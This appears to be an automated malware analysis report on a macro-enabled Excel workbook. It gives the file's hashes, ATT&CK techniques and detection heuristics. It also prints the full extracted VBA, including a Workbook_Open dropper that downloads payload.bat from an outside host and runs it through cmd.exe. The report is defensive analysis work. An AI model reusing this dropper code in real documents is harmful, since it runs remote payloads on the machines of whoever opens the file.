Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b6d44a32d7a3d96b…

MALICIOUS

Office (OOXML)

35.0 KB Created: 2021-08-10 19:03:47 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-27
MD5: 6d6ea894846795845184e01301a3a1bf SHA-1: f3de96ce6da9ee2b83a120c1da7d429f182739a4 SHA-256: b6d44a32d7a3d96be4fe3ec3bda84baff0239b7a98b816fdcc6aecb7ccdd9e8a
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1071.001 Web Protocols

The VBA macro contains a Workbook_Open event that is triggered when the document is opened. It uses CreateObject to instantiate Microsoft.XMLHTTP and ADODB.Stream objects to download a file from 'http://demo.ryanrasmuss.com/download/data.csv' and save it as 'payload.csv' in the same directory as the workbook. This indicates an attempt to download and execute a second-stage payload, likely a batch file or executable, from a remote server.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objStream.Write objXmlHTTpReq.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.10/download/data.csv Referenced by macro
    • http://demo.ryanrasmuss.com/download/data.csvReferenced by macro
    • http://demo.ryanrasmuss.com/download/payload.batReferenced by macro

Extracted artifacts 8

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3874 bytes
SHA-256: cf7ca7675207c32f26a16542bdc503bd6d033a93f971dc49fa54bc218a07faed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Attribute VB_Control = "CommandButton2, 2, 1, MSForms, CommandButton"
Attribute VB_Control = "CommandButton3, 3, 2, MSForms, CommandButton"
Attribute VB_Control = "CommandButton4, 4, 3, MSForms, CommandButton"
Attribute VB_Control = "CommandButton5, 5, 4, MSForms, CommandButton"
Attribute VB_Control = "CommandButton6, 6, 5, MSForms, CommandButton"
Private Sub CommandButton1_Click()

Range("A1").Value = "Hello from test button"

End Sub

Private Sub CommandButton2_Click()

Range("A1").Clear
Range("A2").Clear

End Sub

Private Sub CommandButton3_Click()

    Dim FileURL As String
    Dim objXmlHTTpReq As Object
    Dim objStream As Object
    
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/data.csv"
    
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    
    If objXmlHTTpReq.Status = 200 Then
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Open
        objStream.Type = 1
        objStream.Write objXmlHTTpReq.responseBody
        objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.csv", 2
        objStream.Close
    End If


End Sub

Private Sub CommandButton4_Click()

    ' Kill (ThisWorkbook.Path & "\" & "payload.csv")
    Kill (ThisWorkbook.Path & "\" & "payload.bat")

End Sub

Private Sub CommandButton5_Click()
' Download real payload executable

    Dim FileURL As String
    Dim objXmlHTTpReq As Object
    Dim objStream As Object
    
    ' FileURL = "http://192.168.1.10/download/data.csv"
    FileURL = "http://demo.ryanrasmuss.com/download/payload.bat"
    
    Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
    objXmlHTTpReq.Open "GET", FileURL, False
    objXmlHTTpReq.send
    
    If objXmlHTTpReq.Status = 200 Then
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Open
        objStream.Type = 1
        objStream.Write objXmlHTTpReq.responseBody
        objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.bat", 2
        objStream.Close
    End If
    
    
    
    

End Sub

Private Sub CommandButton6_Click()
    ' below works well without reusability
    Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"

    
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()

Range("A2").Value = "This is populated when file is open"

'download payload

Dim FileURL As String
Dim objXmlHTTpReq As Object
Dim objStream As Object
    
' FileURL = "http://192.168.1.10/download/data.csv"
FileURL = "http://demo.ryanrasmuss.com/download/payload.bat"
    
Set objXmlHTTpReq = CreateObject("Microsoft.XMLHTTP")
objXmlHTTpReq.Open "GET", FileURL, False
objXmlHTTpReq.send
    
If objXmlHTTpReq.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Open
    objStream.Type = 1
    objStream.Write objXmlHTTpReq.responseBody
    objStream.SaveToFile ThisWorkbook.Path & "\" & "payload.bat", 2
    objStream.Close
End If
    
' below works well without reusability
Shell "cmd.exe /k cd " & ThisWorkbook.Path & " && payload.bat"


End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 33792 bytes
SHA-256: 93e5373b22880b10aa6d8bebe8a2d000fef25e3dc731cc32ac5c947c747ec154
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image3.emf 2784 bytes
SHA-256: 4e7691aec648ee92cfe2bcb85209d9edc57b4cf29daf89d8ec8fdfadaab31c18
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2620 bytes
SHA-256: 3cc5ce08965d56848f4e971e9d4cd8dbdde07a0edc94909892aa18d785867bce
emf_02.emf ooxml-emf OOXML EMF part: xl/media/image5.emf 2820 bytes
SHA-256: 8f8cea54ebe69ed2ff9478da3232161a363201a5c41339771a0db3f937c7dc10
emf_03.emf ooxml-emf OOXML EMF part: xl/media/image6.emf 2772 bytes
SHA-256: daea7a74d492cde8ee1ba366bcbeb6d1be3badb8f5323c6cd1b22d08273bcd23
emf_04.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 2700 bytes
SHA-256: 3f237613a20d53bac25ccaeabb58071ac15d40f19f97d51e7f36770ce7a86612
emf_05.emf ooxml-emf OOXML EMF part: xl/media/image4.emf 2700 bytes
SHA-256: b7baa9dd8fa5637eeed8882926708ca6a9a4d0efe6730ce7c4e8d5b42c6f6516

Open this report in the interactive analyzer, or submit your own file for analysis.